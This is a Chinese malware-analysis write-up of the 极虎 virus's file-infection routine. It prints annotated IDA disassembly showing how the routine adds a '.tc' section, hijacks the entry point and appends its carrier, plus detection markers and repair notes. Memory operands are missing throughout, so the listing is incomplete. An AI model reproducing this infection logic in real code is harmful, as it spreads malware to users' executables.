极虎感染代码的详细分析
【文章标题】: 极虎感染型病毒感染代码的详细分析
【文章作者】: fzyr520
【使用工具】: OD,IDA,PEID
【操作平台】: XP-SP2
【作者声明】: 其他部分有人分析过了,感染部分我补上,如有不对请指正。
解压密码:123
感染代码中,我标注的函数是Infect
EXPLORER.EXE(感染源)放出appmgmts.dll,感染功能在appmgmts.dll中
1.先判断是否有签名,如果是系统签名文件就不感染;
.text:00406B36 ; int __stdcall Infect(LPCSTR lpMultiByteStr)
.text:00406B36 ; Infect(path): checks the file named by lpMultiByteStr, maps its headers,
.text:00406B36 ; appends a ".tc" section holding a 0x1FB-byte stub plus the carrier image,
.text:00406B36 ; and redirects AddressOfEntryPoint into that section. The listing is three
.text:00406B36 ; excerpts; 406BB5-406BDD and 406CD5-406D5B are omitted by the author.
.text:00406B36 ; NOTE(review): the square-bracketed memory operands were lost when the listing
.text:00406B36 ; was pasted, so "mov , esp" and "and , 0" are stores to the [ebp+...] slots
.text:00406B36 ; declared below; the empty operands are not literal code.
.text:00406B36 Infect proc near ; CODE XREF: sub_405F38+FCp
.text:00406B36
.text:00406B36 var_13C = dword ptr -13Ch
.text:00406B36 var_138 = dword ptr -138h
.text:00406B36 var_134 = byte ptr -134h
.text:00406B36 var_E8 = dword ptr -0E8h
.text:00406B36 Infect_Section_FileOffset= dword ptr -0E4h
.text:00406B36 var_E0 = dword ptr -0E0h
.text:00406B36 var_DC = byte ptr -0DCh
.text:00406B36 PE = dword ptr -90h
.text:00406B36 EntryPoint_source= dword ptr -8Ch
.text:00406B36 CreationTime = byte ptr -88h
.text:00406B36 var_70 = dword ptr -70h
.text:00406B36 Buffer = dword ptr -6Ch
.text:00406B36 hFile = dword ptr -68h
.text:00406B36 Dst = dword ptr -64h
.text:00406B36 var_60 = dword ptr -60h
.text:00406B36 SizeOf_InfectSource= dword ptr -5Ch
.text:00406B36 InfectSection_VirtualAddress= dword ptr -58h
.text:00406B36 SizeOf_InfectSource_FileOffSet= dword ptr -54h
.text:00406B36 var_50 = dword ptr -50h
.text:00406B36 var_42 = word ptr -42h
.text:00406B36 var_40 = dword ptr -40h
.text:00406B36 var_3C = dword ptr -3Ch
.text:00406B36 current_section = dword ptr -38h
.text:00406B36 NumberOfBytesWritten= dword ptr -34h
.text:00406B36 hObject = dword ptr -30h
.text:00406B36 var_2C = dword ptr -2Ch
.text:00406B36 lpBaseAddress = dword ptr -28h
.text:00406B36 var_24 = dword ptr -24h
.text:00406B36 var_20 = dword ptr -20h
.text:00406B36 raw_size = dword ptr -1Ch
.text:00406B36 var_18 = dword ptr -18h
.text:00406B36 var_10 = dword ptr -10h
.text:00406B36 var_4 = dword ptr -4
.text:00406B36 lpMultiByteStr= dword ptr8
.text:00406B36 arg_20 = dword ptr28h
.text:00406B36 arg_34 = dword ptr3Ch
.text:00406B36
.text:00406B36 push ebp
.text:00406B37 mov ebp, esp
.text:00406B39 push 0FFFFFFFFh ; trylevel -1, scope table, handler, saved fs:0: the usual
.text:00406B3B push offset unk_409F00 ; MSVC SEH frame layout (the scope table at 409F00 refers
.text:00406B40 push offset loc_4089A0 ; to loc_4071D7 / loc_4071DB at the end of the function)
.text:00406B45 mov eax, large fs:0
.text:00406B4B push eax
.text:00406B4C mov large fs:0, esp ; register the SEH frame
.text:00406B53 push ecx
.text:00406B54 push ecx
.text:00406B55 sub esp, 124h ; reserve the locals declared above
.text:00406B5B push ebx
.text:00406B5C push esi
.text:00406B5D push edi
.text:00406B5E mov , esp ; save esp for the handler (loc_4071DB reloads esp from a local)
.text:00406B61 and , 0 ; 406B61-406B9F: zero the handle/pointer/counter locals so the common
.text:00406B65 and , 0 ; exit at loc_4071A4 can tell which resources were actually acquired
.text:00406B69 and , 0
.text:00406B6D and , 0
.text:00406B71 and , 0
.text:00406B75 and , 0
.text:00406B79 and , 0
.text:00406B7D and , 0
.text:00406B81 and , 0
.text:00406B88 and , 0
.text:00406B8C or , 0FFFFFFFFh ; -1: probably hFile = INVALID_HANDLE_VALUE (tested at 4071C2)
.text:00406B90 and , 0
.text:00406B94 and , 0
.text:00406B9B and , 0
.text:00406B9F and , 0
.text:00406BA3 push ; lpMultiByteStr (path of the candidate file)
.text:00406BA6 call JudgmentWinVerifyTrust
.text:00406BAB cmp eax, 1 ;
.text:00406BAB ; signature check: files carrying a (system) signature are not infected, so
.text:00406BAB ; unsigned executables are the population at risk
.text:00406BAB ;
.text:00406BAE jnz short loc_406BB5 ; != 1: continue (406BB5-406BDD is not shown in the listing)
.text:00406BB0 jmp loc_4071A4 ; == 1: signed, leave the file alone (common exit)
2.文件映射
.text:00406BDE ; ---------------------------------------------------------------------------
.text:00406BDE
.text:00406BDE loc_406BDE: ; CODE XREF: Infect+A1j
.text:00406BDE ; Excerpt 2: map the file and validate its headers. hFile is opened in the
.text:00406BDE ; omitted range 406BB5-406BDD (not shown).
.text:00406BDE push 0 ; int
.text:00406BE0 lea eax,
.text:00406BE6 push eax ; lpCreationTime
.text:00406BE7 push ; hFile
.text:00406BEA call __GetFileTime ; __GetFileTime(hFile, &CreationTime, 0): reads the timestamps;
.text:00406BEA ; called again with 1 at 407192 after the write, presumably to put them
.text:00406BEA ; back (so file times are not a reliable indicator of infection)
.text:00406BEF push FILE_END ; dwMoveMethod
.text:00406BF1 push 0 ; lpDistanceToMoveHigh
.text:00406BF3 push 0 ; lDistanceToMove
.text:00406BF5 push ; hFile
.text:00406BF8 call ds:SetFilePointer ; seek to the end: the return value is the file size
.text:00406BFE mov , eax ; file size kept in a local
.text:00406C01 push 0 ; lpName
.text:00406C03 push 0 ; dwMaximumSizeLow
.text:00406C05 push 0 ; dwMaximumSizeHigh
.text:00406C07 push PAGE_READWRITE; flProtect
.text:00406C09 push 0 ; lpFileMappingAttributes
.text:00406C0B push ; hFile
.text:00406C0E call ds:CreateFileMappingA
.text:00406C14 mov , eax
.text:00406C17 cmp , 0 ;
.text:00406C17 ; did CreateFileMapping succeed? (NULL -> give up)
.text:00406C17 ;
.text:00406C1B jnz short loc_406C22
.text:00406C1D jmp loc_4071A4
.text:00406C22 ; ---------------------------------------------------------------------------
.text:00406C22
.text:00406C22 loc_406C22: ; CODE XREF: Infect+E5j
.text:00406C22 push 400h ; dwNumberOfBytesToMap
.text:00406C27 push 0 ; dwFileOffsetLow
.text:00406C29 push 0 ; dwFileOffsetHigh
.text:00406C2B push FILE_MAP_ALL_ACCESS ; dwDesiredAccess
.text:00406C30 push ; hFileMappingObject
.text:00406C33 call ds:MapViewOfFile ; only the first 0x400 bytes (the headers) are mapped;
.text:00406C33 ; section data is appended later with WriteFile, not through this view
.text:00406C39 mov , eax
.text:00406C3C cmp , 0
.text:00406C40 jz short loc_406C4F
.text:00406C42 mov eax,
.text:00406C45 movzx eax, word ptr
.text:00406C48 cmp eax, 5A4Dh ;
.text:00406C48 ; is e_magic 'MZ'?
.text:00406C48 ;
.text:00406C4D jz short loc_406C54
.text:00406C4F
.text:00406C4F loc_406C4F: ; CODE XREF: Infect+10Aj
.text:00406C4F jmp loc_4071A4 ; mapping failed or not an MZ image: common exit
.text:00406C54 ; ---------------------------------------------------------------------------
.text:00406C54
.text:00406C54 loc_406C54: ; CODE XREF: Infect+117j
.text:00406C54 mov eax,
.text:00406C57 mov ecx,
.text:00406C5A add ecx,
.text:00406C5D mov , ecx ; presumably base + e_lfanew -> pointer to the PE header (local "PE", ebp-90h)
.text:00406C63 mov eax,
.text:00406C66 add eax,
.text:00406C69 cmp , eax
.text:00406C6F jnb short loc_406C8C
.text:00406C71 mov eax,
.text:00406C77 cmp eax,
.text:00406C7A jbe short loc_406C8C ; two range checks on the header offset (operands lost);
.text:00406C7A ; presumably against the 0x400 view and the file size, before 'PE' is read
.text:00406C7C mov eax,
.text:00406C82 movzx eax, word ptr
.text:00406C85 cmp eax, 4550h ;
.text:00406C85 ; is the signature 'PE'?
.text:00406C8A jz short loc_406C91
.text:00406C8C
.text:00406C8C loc_406C8C: ; CODE XREF: Infect+139j
.text:00406C8C ; Infect+144j
.text:00406C8C jmp loc_4071A4
.text:00406C91 ; ---------------------------------------------------------------------------
.text:00406C91
.text:00406C91 loc_406C91: ; CODE XREF: Infect+154j
.text:00406C91 mov eax,
.text:00406C97 movzx eax, word ptr ; NumberOfSections
.text:00406C9B dec eax
.text:00406C9C imul eax, 28h ; (NumberOfSections - 1) * sizeof(IMAGE_SECTION_HEADER)
.text:00406C9F mov ecx, ;
.text:00406C9F ; ebp-90h: the PE header pointer (the author's note calls it the export
.text:00406C9F ; table; the local is named PE above)
.text:00406C9F ;
.text:00406CA5 lea eax,
.text:00406CAC mov , eax ;
.text:00406CAC ; address of the last section header goes into ebp+var_20
.text:00406CAC ;
.text:00406CAF mov eax,
.text:00406CB2 movzx eax, word ptr ; NumberOfLinenumbers of that last section
.text:00406CB6 movzx ecx, word_40BE64 ; compared with 0xD9 (word_40BE64 = D9, see 407029)
.text:00406CB6 ; the header written at 40702F carries NumberOfLinenumbers = 0xD9, so this
.text:00406CB6 ; is the re-infection check: a last section already marked is left alone.
.text:00406CB6 ; Detection note: the field is deprecated in PE and normally 0; 0xD9 in the
.text:00406CB6 ; last section header is a cheap marker for this family.
.text:00406CBD cmp eax, ecx
.text:00406CBF jl short loc_406CC6 ; marker absent (< 0xD9): continue
.text:00406CC1 jmp loc_4071A4 ; already marked: exit
.text:00406CC6 ; ---------------------------------------------------------------------------
.text:00406CC6
.text:00406CC6 loc_406CC6: ; CODE XREF: Infect+189j
.text:00406CC6 mov eax,
.text:00406CC9 movzx eax, word ptr
.text:00406CCD test eax, eax
.text:00406CCF jz loc_406D5C ;
.text:00406CCF ; this branch is taken in the traced sample (the word tested is zero); the
.text:00406CCF ; fall-through path 406CD5-406D5B is omitted from the listing
.text:00406CCF ;
3.具体感染过程
.text:00406D5C ; Infect+1AFj
.text:00406D5C ; Excerpt 3: build the new section header, patch the PE header, append the
.text:00406D5C ; stub and carrier image, and write the return jump. (The loc_406D5C label
.text:00406D5C ; line is missing from the paste; the line above is the tail of its XREF.)
.text:00406D5C ; Triage indicators established here: last section named ".tc" (406DF4),
.text:00406D5C ; Characteristics 0E0000020h (407022), NumberOfLinenumbers 0D9h (40702F),
.text:00406D5C ; AddressOfEntryPoint == that section's VirtualAddress (40708A), section
.text:00406D5C ; data = 0x1FB-byte stub, 4-byte size, carrier image (4070FA-407149).
.text:00406D5C mov eax,
.text:00406D62 movzx eax, word ptr
.text:00406D66 imul eax, 28h
.text:00406D69 add eax, 0F8h ; NumberOfSections*0x28 + 0xF8 (sizeof IMAGE_NT_HEADERS32):
.text:00406D69 ; offset of the slot right after the last section header; the code below
.text:00406D69 ; checks that this 0x28-byte slot is all zero
.text:00406D69 ; (0xF8 is hard-coded; no use of SizeOfOptionalHeader is visible)
.text:00406D6E mov , eax
.text:00406D71 mov eax,
.text:00406D77 add eax,
.text:00406D7A mov , eax ; ebp+var_70 = address in the mapping just past the last section header
.text:00406D7D cmp , 0 ;
.text:00406D7D ; ebp+var_2C is 0 here; decides whether the slot after the last section
.text:00406D7D ; header has to be verified as zero
.text:00406D7D ;
.text:00406D81 jnz short loc_406DB7
.text:00406D83 and , 0
.text:00406D87 jmp short loc_406D90 ;
.text:00406D87 ; loop: advance 4 bytes at a time, 0xA times = 0x28 bytes, one section header
.text:00406D87 ;
.text:00406D89 ; ---------------------------------------------------------------------------
.text:00406D89
.text:00406D89 loc_406D89: ; CODE XREF: Infect+274j
.text:00406D89 mov eax,
.text:00406D8C inc eax
.text:00406D8D mov , eax ; dword counter += 1
.text:00406D90
.text:00406D90 loc_406D90: ; CODE XREF: Infect+251j
.text:00406D90 cmp , 0Ah ;
.text:00406D90 ; 0xA dwords = 0x28 bytes, the size of one section header
.text:00406D90 ;
.text:00406D94 jge short loc_406DAC
.text:00406D96 mov eax,
.text:00406D99 mov ecx,
.text:00406D9C add ecx, ; accumulate the dword at the current position
.text:00406D9E mov , ecx
.text:00406DA1 mov eax,
.text:00406DA4 add eax, 4
.text:00406DA7 mov , eax ; position += 4
.text:00406DAA jmp short loc_406D89
.text:00406DAC ; ---------------------------------------------------------------------------
.text:00406DAC
.text:00406DAC loc_406DAC: ; CODE XREF: Infect+25Ej
.text:00406DAC cmp , 0 ; a non-zero accumulator means there is no free slot for another
.text:00406DAC ; section header: the file is left alone (files without header slack are
.text:00406DAC ; therefore not infected by this routine)
.text:00406DB0 jz short loc_406DB7
.text:00406DB2 jmp loc_4071A4
.text:00406DB7 ; ---------------------------------------------------------------------------
.text:00406DB7
.text:00406DB7 loc_406DB7: ; CODE XREF: Infect+24Bj
.text:00406DB7 ; Infect+27Aj
.text:00406DB7 mov eax,
.text:00406DBD mov eax,
.text:00406DC0 mov , eax ;
.text:00406DC0 ; save the original AddressOfEntryPoint (EntryPoint_source); it goes into
.text:00406DC0 ; the stub at 407180 and is the value a repair tool has to restore
.text:00406DC0 ;
.text:00406DC6 mov eax,
.text:00406DCC movzx eax, word ptr
.text:00406DD0 dec eax
.text:00406DD1 imul eax, 28h
.text:00406DD4 mov ecx,
.text:00406DDA lea eax,
.text:00406DE1 mov , eax ; address of the host's last section header again
.text:00406DE4 push 28h ; Size
.text:00406DE6 push 0 ; Val
.text:00406DE8 lea eax,
.text:00406DEB push eax ; Dst
.text:00406DEC call memset ; zero a 0x28-byte section header template (Dst) on the stack
.text:00406DF1 add esp, 0Ch
.text:00406DF4 mov , 'ct.' ; section name: the dword 'ct.' is the bytes ".tc" followed by NUL
.text:00406DFB mov eax,
.text:00406E01 mov , eax
.text:00406E04 mov eax,
.text:00406E0A push ; SectionAlignment
.text:00406E0D mov eax, nNumberOfBytesToWrite ; 0003d600: size of the carrier image (global)
.text:00406E12 add eax, 1FBh ; + 0x1FB, the size of the stub written at 4070FA
.text:00406E17 push eax
.text:00406E18 call CalculateSection ;
.text:00406E18 ; VirtualSize of the added ".tc" section, rounded up to SectionAlignment:
.text:00406E18 ; fun(carrier_size + stub_size, SectionAlignment)
.text:00406E18 ;
.text:00406E1D mov , eax ; 3e000 in the traced sample
.text:00406E20 mov eax,
.text:00406E26 push
.text:00406E29 mov eax,
.text:00406E2C push
.text:00406E2F call CalculateSection ;
.text:00406E2F ; VirtualSize of the host's last section, rounded up to SectionAlignment
.text:00406E2F ;
.text:00406E34 mov ecx, ;
.text:00406E34 ;
.text:00406E37 add eax, ;
.text:00406E37 ; + that section's VirtualAddress = VirtualAddress of the new section
.text:00406E37 ;
.text:00406E3A mov , eax
.text:00406E3D mov eax,
.text:00406E43 push ; FileAlignment
.text:00406E46 mov eax, nNumberOfBytesToWrite ; 0003d600
.text:00406E4B add eax, 1FBh
.text:00406E50 push eax
.text:00406E51 call CalculateSection ;
.text:00406E51 ; SizeOfRawData of the added ".tc" section, rounded up to FileAlignment:
.text:00406E51 ; fun(carrier_size + stub_size, FileAlignment)
.text:00406E56 mov , eax
.text:00406E59 and , 0
.text:00406E60 push 4Ch ; Size
.text:00406E62 push 0 ; Val
.text:00406E64 lea eax,
.text:00406E6A push eax ; Dst
.text:00406E6B call memset ; zero a 0x4C-byte per-section table (by frame layout, var_134)
.text:00406E70 add esp, 0Ch
.text:00406E73 and , 0
.text:00406E7A push 4Ch ; Size
.text:00406E7C push 0 ; Val
.text:00406E7E lea eax,
.text:00406E84 push eax ; Dst
.text:00406E85 call memset ; second 0x4C-byte table (by frame layout, var_DC)
.text:00406E8A add esp, 0Ch
.text:00406E8D and , 0
.text:00406E91 mov , 1 ; section loop counter starts at 1
.text:00406E98 jmp short loc_406EA1
.text:00406E9A ; ---------------------------------------------------------------------------
.text:00406E9A
.text:00406E9A loc_406E9A: ; CODE XREF: Infect:loc_406F0Cj
.text:00406E9A mov eax,
.text:00406E9D inc eax ;
.text:00406E9D ; section counter += 1
.text:00406E9D ;
.text:00406E9E mov , eax
.text:00406EA1
.text:00406EA1 loc_406EA1: ; CODE XREF: Infect+362j
.text:00406EA1 mov eax,
.text:00406EA7 movzx eax,
.text:00406EAB cmp , eax ;
.text:00406EAB ; loop over the section table while counter <= NumberOfSections
.text:00406EAB ;
.text:00406EAE jg short loc_406F0E
.text:00406EB0 mov eax,
.text:00406EB6 movzx eax,
.text:00406EBA sub eax, ; NumberOfSections - counter: the table appears to be walked from
.text:00406EBA ; the last header backwards (counter 1 selects the last section)
.text:00406EBD imul eax, 28h
.text:00406EC0 mov ecx,
.text:00406EC6 lea eax,
.text:00406ECD mov , eax ; current_section = address of that header
.text:00406ED0 mov eax,
.text:00406ED3 cmp , 0 ; skip sections whose size field is 0
.text:00406ED7 jz short loc_406F0C
.text:00406ED9 mov eax,
.text:00406EDC mov eax, ; the section's file offset
.text:00406EDF mov ecx,
.text:00406EE2 add eax, ;
.text:00406EE2 ; file offset + size = end of this section's data on disk; done for every
.text:00406EE2 ; section, the result feeds the raw offset of the added section
.text:00406EE5 mov , eax
.text:00406EE8 mov eax, ; the sum just computed
.text:00406EE8 ; (the author reads ebp+var_24 as the raw offset of the next section)
.text:00406EE8 ;
.text:00406EEB sub eax, ; per the author: yields the current section's raw size
.text:00406EEE mov ecx, ; ebp+var_2C: index into the table, counted from 0
.text:00406EF1 mov , eax ; store the value in the var_138-based table
.text:00406EF8 mov eax,
.text:00406EFB mov ecx,
.text:00406EFE mov , ecx
.text:00406F05 mov eax,
.text:00406F08 inc eax ;
.text:00406F08 ; table index += 1
.text:00406F08 ;
.text:00406F09 mov , eax
.text:00406F0C
.text:00406F0C loc_406F0C: ; CODE XREF: Infect+3A1j
.text:00406F0C jmp short loc_406E9A
.text:00406F0E ; ---------------------------------------------------------------------------
.text:00406F0E
.text:00406F0E loc_406F0E: ; CODE XREF: Infect+378j
.text:00406F0E and , 0
.text:00406F15 mov eax,
.text:00406F1B mov , eax
.text:00406F1E and , 0 ; second pass over the table: a running maximum (see jbe below)
.text:00406F22 jmp short loc_406F2B
.text:00406F24 ; ---------------------------------------------------------------------------
.text:00406F24
.text:00406F24 loc_406F24: ; CODE XREF: Infect:loc_406F4Fj
.text:00406F24 mov eax,
.text:00406F27 inc eax ; next table entry
.text:00406F28 mov , eax
.text:00406F2B
.text:00406F2B loc_406F2B: ; CODE XREF: Infect+3ECj
.text:00406F2B mov eax,
.text:00406F2E cmp eax,
.text:00406F31 jge short loc_406F51
.text:00406F33 mov eax,
.text:00406F36 mov ecx,
.text:00406F39 cmp ecx, ; author: is this section's raw_size 0? The jbe/store pair keeps
.text:00406F39 ; the larger of the two values, i.e. a running maximum
.text:00406F40 jbe short loc_406F4F
.text:00406F42 mov eax,
.text:00406F45 mov eax,
.text:00406F4C mov , eax
.text:00406F4F
.text:00406F4F loc_406F4F: ; CODE XREF: Infect+40Aj
.text:00406F4F jmp short loc_406F24
.text:00406F51 ; ---------------------------------------------------------------------------
.text:00406F51
.text:00406F51 loc_406F51: ; CODE XREF: Infect+3FBj
.text:00406F51 and , 0
.text:00406F55 jmp short loc_406F5E
.text:00406F57 ; ---------------------------------------------------------------------------
.text:00406F57
.text:00406F57 loc_406F57: ; CODE XREF: Infect:loc_406F87j
.text:00406F57 mov eax,
.text:00406F5A inc eax
.text:00406F5B mov , eax
.text:00406F5E
.text:00406F5E loc_406F5E: ; CODE XREF: Infect+41Fj
.text:00406F5E mov eax,
.text:00406F61 cmp eax,
.text:00406F64 jge short loc_406F89
.text:00406F66 mov eax,
.text:00406F69 mov ecx,
.text:00406F6C cmp ecx, ; third pass: find the table entry equal to the maximum
.text:00406F73 jnz short loc_406F87
.text:00406F75 mov eax,
.text:00406F78 mov eax,
.text:00406F7F mov , eax ; remember which entry it was
.text:00406F85 jmp short loc_406F89
.text:00406F87 ; ---------------------------------------------------------------------------
.text:00406F87
.text:00406F87 loc_406F87: ; CODE XREF: Infect+43Dj
.text:00406F87 jmp short loc_406F57
.text:00406F89 ; ---------------------------------------------------------------------------
.text:00406F89
.text:00406F89 loc_406F89: ; CODE XREF: Infect+42Ej
.text:00406F89 ; Infect+44Fj
.text:00406F89 cmp , 0
.text:00406F90 jnz short loc_406F9C
.text:00406F92 mov , 1 ; nothing matched: fall back to 1
.text:00406F9C
.text:00406F9C loc_406F9C: ; CODE XREF: Infect+45Aj
.text:00406F9C mov eax,
.text:00406FA2 movzx eax,
.text:00406FA6 sub eax,
.text:00406FAC imul eax, 28h
.text:00406FAF mov ecx,
.text:00406FB5 lea eax,
.text:00406FBC mov , eax ; header of the section chosen above
.text:00406FBF mov eax,
.text:00406FC5 push
.text:00406FC8 mov eax,
.text:00406FCB push
.text:00406FCE call CalculateSection ; size of the host's last section, rounded up to FileAlignment
.text:00406FD3 mov , eax
.text:00406FD6 mov eax,
.text:00406FD9 mov ecx,
.text:00406FDC add ecx, ; + its file offset = raw offset of the added section
.text:00406FDF mov , ecx
.text:00406FE5 mov eax,
.text:00406FE8 sub eax, ; a difference (operands lost); negated below, it is presumably the
.text:00406FE8 ; FILE_END seek distance used at 4070E2
.text:00406FEE mov , eax
.text:00406FF4 cmp , 0 ;
.text:00406FF4 ; is that size 0?
.text:00406FF4 ;
.text:00406FF8 jz short loc_40700A
.text:00406FFA xor eax, eax
.text:00406FFC sub eax, ; negate
.text:00407002 mov , eax
.text:00407008 jmp short loc_407019
.text:0040700A ; ---------------------------------------------------------------------------
.text:0040700A
.text:0040700A loc_40700A: ; CODE XREF: Infect+4C2j
.text:0040700A mov eax,
.text:00407010 sub eax,
.text:00407013 mov , eax
.text:00407019
.text:00407019 loc_407019: ; CODE XREF: Infect+4D2j
.text:00407019 mov eax,
.text:0040701F mov , eax ; remaining field of the header template
.text:00407022 mov , 0E0000020h ; Characteristics = CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE
.text:00407022 ; (an executable, writable last section is itself a triage signal)
.text:00407029 mov ax, word_40BE64 ; word_40BE64 = d9
.text:0040702F mov , ax ; NumberOfLinenumbers = 0xD9, the marker tested at 406CB6
.text:00407033 push 28h ; Size
.text:00407035 lea eax,
.text:00407038 push eax ; Src
.text:00407039 mov eax,
.text:0040703F add eax,
.text:00407042 push eax ; Dst
.text:00407043 call memcpy ; copy the template into the free slot after the last section header
.text:00407048 add esp, 0Ch
.text:0040704B mov eax,
.text:00407051 movzx eax,
.text:00407055 inc eax ;
.text:00407055 ; NumberOfSections + 1
.text:00407055 ;
.text:00407056 mov ecx,
.text:0040705C mov , ax ;
.text:0040705C ; write the post-infection section count back into the PE header
.text:0040705C ;
.text:00407060 mov eax,
.text:00407066 cmp , 0 ; is SizeOfCode 0?
.text:0040706A jz short loc_407081
.text:0040706C mov eax,
.text:00407072 mov eax,
.text:00407075 add eax, ; SizeOfCode + size of the new section
.text:00407078 mov ecx,
.text:0040707E mov , eax ; replace the original SizeOfCode
.text:0040707E ;
.text:00407081
.text:00407081 loc_407081: ; CODE XREF: Infect+534j
.text:00407081 mov eax,
.text:00407087 mov ecx, ; InfectSection_VirtualAddress becomes the new entry point
.text:0040708A mov , ecx ; AddressOfEntryPoint = VirtualAddress of the added section
.text:0040708D mov eax,
.text:00407093 mov eax,
.text:00407096 add eax, ; SizeOfImage + virtual size of the new section
.text:00407099 mov ecx,
.text:0040709F mov , eax ; replace the original SizeOfImage
.text:004070A2 push ; lpBaseAddress
.text:004070A5 call ds:UnmapViewOfFile ; the header edits reach the file here
.text:004070AB push ; hObject
.text:004070AE call ds:CloseHandle
.text:004070B4 and , 0 ; clear the view pointer and mapping handle so the exit path at
.text:004070B8 and , 0 ; loc_4071A4 does not release them a second time
.text:004070BC push FILE_END ; dwMoveMethod
.text:004070BE push 0 ; lpDistanceToMoveHigh
.text:004070C0 mov eax,
.text:004070C6 add eax,
.text:004070C9 push eax ; lDistanceToMove
.text:004070CA push ; hFile
.text:004070CD call ds:SetFilePointer
.text:004070D3 push ; hFile
.text:004070D6 call ds:SetEndOfFile ;
.text:004070D6 ; grow the file by the new section's length (0x3E000 in the traced sample)
.text:004070D6 ;
.text:004070DC push FILE_END ; dwMoveMethod
.text:004070DE push 0 ; lpDistanceToMoveHigh
.text:004070E0 xor eax, eax
.text:004070E2 sub eax,
.text:004070E5 push eax ; lDistanceToMove
.text:004070E6 push ; hFile
.text:004070E9 call ds:SetFilePointer ;
.text:004070E9 ; seek back to the original end of file (start of the new section's data)
.text:004070E9 ;
.text:004070EF push 0 ; lpOverlapped
.text:004070F1 lea eax,
.text:004070F4 push eax ; lpNumberOfBytesWritten
.text:004070F5 push 1FBh ; nNumberOfBytesToWrite
.text:004070FA push offset loc_409B78 ;
.text:004070FA ; loc_409B78 is the 0x1FB-byte stub that becomes the new section's code
.text:004070FA ;
.text:004070FF push ; hFile
.text:00407102 call ds:WriteFile ;
.text:00407102 ; write the stub at the start of the added section
.text:00407102 ;
.text:00407108 push 0 ; lpOverlapped
.text:0040710A lea eax,
.text:0040710D push eax ; lpNumberOfBytesWritten
.text:0040710E push nNumberOfBytesToWrite ; nNumberOfBytesToWrite
.text:00407114 push lpBuffer ; lpBuffer
.text:0040711A push ; hFile
.text:0040711D call ds:WriteFile ;
.text:0040711D ; at section offset 0x1FB write the whole infection source (the carrier
.text:0040711D ; image; lpBuffer / nNumberOfBytesToWrite are globals)
.text:0040711D ;
.text:00407123 push FILE_CURRENT ; dwMoveMethod
.text:00407125 push 0 ; lpDistanceToMoveHigh
.text:00407127 xor eax, eax
.text:00407129 sub eax, nNumberOfBytesToWrite
.text:0040712F push eax ; lDistanceToMove
.text:00407130 push ; hFile
.text:00407133 call ds:SetFilePointer ;
.text:00407133 ; seek back to offset 0x1FB, the start of the carrier image
.text:00407133 ;
.text:00407139 push 0 ; lpOverlapped
.text:0040713B lea eax,
.text:0040713E push eax ; lpNumberOfBytesWritten
.text:0040713F push 4 ; nNumberOfBytesToWrite
.text:00407141 push offset nNumberOfBytesToWrite ; lpBuffer
.text:00407146 push ; hFile
.text:00407149 call ds:WriteFile ;
.text:00407149 ; write the 4-byte carrier size over the first 4 bytes of the carrier image
.text:00407149 ; just written (the author gives 3e600 here but 0003d600 at 406E0D/406E46,
.text:00407149 ; most likely a typo). For a repair tool: those 4 bytes are not recoverable
.text:00407149 ; from the file itself.
.text:00407149 ;
.text:0040714F mov eax,
.text:00407152 add eax, 193h
.text:00407157 mov ecx,
.text:0040715D sub ecx, eax ;
.text:0040715D ; displacement of the jump back to the host's entry point (per the author:
.text:0040715D ; original EP minus (new section VA + 0x193); operands lost). The stub does
.text:0040715D ; not contain this value; it is computed here and patched in below.
.text:0040715D ;
.text:0040715D ;
.text:0040715F mov , ecx
.text:00407162 push FILE_CURRENT ; dwMoveMethod
.text:00407164 push 0 ; lpDistanceToMoveHigh
.text:00407166 push 0FFFFFF90h ; lDistanceToMove = -0x70: from 0x1FF back to stub offset 0x18F;
.text:00407166 ; 0x18F + 4 = 0x193, the base used at 407152, consistent with a rel32 jump
.text:00407168 push ; hFile
.text:0040716B call ds:SetFilePointer
.text:00407171 push 0 ; lpOverlapped
.text:00407173 lea eax,
.text:00407176 push eax ; lpNumberOfBytesWritten
.text:00407177 push 4 ; nNumberOfBytesToWrite
.text:00407179 lea eax,
.text:0040717C push eax ; lpBuffer
.text:0040717D push ; hFile
.text:00407180 call ds:WriteFile ;
.text:00407180 ; patch the displacement into the stub: this is the jmp back to the host
.text:00407180 ;
.text:00407186 push 1 ; int
.text:00407188 lea eax,
.text:0040718E push eax ; lpCreationTime
.text:0040718F push ; hFile
.text:00407192 call __GetFileTime ; second call, flag = 1: presumably restores the timestamps read
.text:00407192 ; at 406BEA (confirm inside __GetFileTime)
.text:00407197 push ; hObject
.text:0040719A call ds:CloseHandle
.text:004071A0 or , 0FFFFFFFFh ; trylevel = -1: leave the __try block
.text:004071A4
.text:004071A4 loc_4071A4: ; CODE XREF: Infect+7Aj
.text:004071A4 ; Infect+A3j ...
.text:004071A4 ; Common exit: every validation failure above jumps here. Resources are
.text:004071A4 ; released only if they were acquired (view != 0, mapping != 0, hFile != -1).
.text:004071A4 cmp , 0
.text:004071A8 jz short loc_4071B3
.text:004071AA push ; lpBaseAddress
.text:004071AD call ds:UnmapViewOfFile
.text:004071B3
.text:004071B3 loc_4071B3: ; CODE XREF: Infect+672j
.text:004071B3 cmp , 0
.text:004071B7 jz short loc_4071C2
.text:004071B9 push ; hObject
.text:004071BC call ds:CloseHandle
.text:004071C2
.text:004071C2 loc_4071C2: ; CODE XREF: Infect+681j
.text:004071C2 cmp , 0FFFFFFFFh ; INVALID_HANDLE_VALUE
.text:004071C6 jz short loc_4071D1
.text:004071C8 push ; hObject
.text:004071CB call ds:CloseHandle
.text:004071D1
.text:004071D1 loc_4071D1: ; CODE XREF: Infect+690j
.text:004071D1 or , 0FFFFFFFFh
.text:004071D5 jmp short loc_40720F
.text:004071D7 ; ---------------------------------------------------------------------------
.text:004071D7
.text:004071D7 loc_4071D7: ; DATA XREF: .rdata:00409F04o
.text:004071D7 ; referenced from the scope table (unk_409F00): presumably the __except
.text:004071D7 ; filter, returning 1 (EXCEPTION_EXECUTE_HANDLER) for any exception
.text:004071D7 xor eax, eax
.text:004071D9 inc eax
.text:004071DA retn
.text:004071DB ; ---------------------------------------------------------------------------
.text:004071DB
.text:004071DB loc_4071DB: ; DATA XREF: .rdata:00409F08o
.text:004071DB ; presumably the __except handler: restores esp and runs the same cleanup,
.text:004071DB ; so a malformed file that faults while the headers are being edited does
.text:004071DB ; not crash the hosting process
.text:004071DB mov esp,
.text:004071DE cmp , 0
.text:004071E2 jz short loc_4071ED
.text:004071E4 push ; lpBaseAddress
.text:004071E7 call ds:UnmapViewOfFile
.text:004071ED
.text:004071ED loc_4071ED: ; CODE XREF: Infect+6ACj
.text:004071ED cmp , 0
.text:004071F1 jz short loc_4071FC
.text:004071F3 push ; hObject
.text:004071F6 call ds:CloseHandle
.text:004071FC
